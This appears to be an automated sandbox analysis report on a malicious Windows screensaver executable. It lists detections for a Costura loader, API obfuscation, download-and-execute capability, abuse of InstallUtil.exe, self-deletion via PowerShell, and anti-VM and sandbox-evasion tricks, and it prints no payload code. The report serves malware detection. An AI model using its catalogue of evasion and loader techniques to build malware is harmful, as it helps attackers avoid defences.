Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6780000.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6040000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.6040000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1476027682.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1514554410.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

3_2_0041BEEE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E17B9 push es; retf	0_2_067E17BC
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E2449 push es; retf	0_2_067E2490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004560BF push ecx; ret	3_2_004560D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00434206 push ecx; ret	3_2_00434219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0045E669 push ecx; ret	3_2_0045E67B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0045C9DD push esi; ret	3_2_0045C9E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004569F0 push eax; ret	3_2_00456A0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_10002806 push ecx; ret	3_2_10002819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00446B75 push ecx; ret	6_2_00446B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00452BB4 push eax; ret	6_2_00452BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044DDB0 push eax; ret	6_2_0044DDC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0044DDB0 push eax; ret	6_2_0044DDEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0044B090 push eax; ret	8_2_0044B0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0044B090 push eax; ret	8_2_0044B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00451D34 push eax; ret	8_2_00451D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00444E71 push ecx; ret	8_2_00444E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00414060 push eax; ret	9_2_00414074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00414060 push eax; ret	9_2_0041409C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00414039 push ecx; ret	9_2_00414049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_004164EB push 0000006Ah; retf	9_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00416553 push 0000006Ah; retf	9_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00416555 push 0000006Ah; retf	9_2_004165C4

Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.5ab0000.3.raw.unpack, TNxvNl2JBgJhNQ78mFm.cs

High entropy of concatenated method names: 'ox22Z6FJd2', 'kgC2crZ6ns', 'Lrl2WYrflT', 'nBN2CekOuW', 'ydb2DNPPhn', 'U7A2euZYAE', 'akj2FIZ29Q', 'qmZ2TvNNWD', 'VV12XXQ4bQ', 'ENS2K9Bc0d'

Contains functionality to download and launch executables

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00406128 ShellExecuteW,URLDownloadToFileW,

3_2_00406128

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

3_2_00419DBA

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\oblig#u0100t#u0100 produkta specifik#u0100cija.scr.exe

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

3_2_0041BEEE

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0040E627 Sleep,ExitProcess,

3_2_0040E627

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1476027682.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory allocated: 29D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory allocated: 2A20000 memory reserve \| memory write watch	Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 6_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

6_2_0040BAE3

Contains functionality to detect virtual machines (SGDT)

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Code function: 0_2_067E6EEB sgdt fword ptr [esi]

0_2_067E6EEB

Contains functionality to enumerate running services

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

3_2_00419AB8

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2429	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 7559	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5481	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4277	Jump to behavior

Found decision node followed by non-executed suspicious APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

API coverage: 9.6 %

May sleep (evasive loops) to hinder dynamic analysis

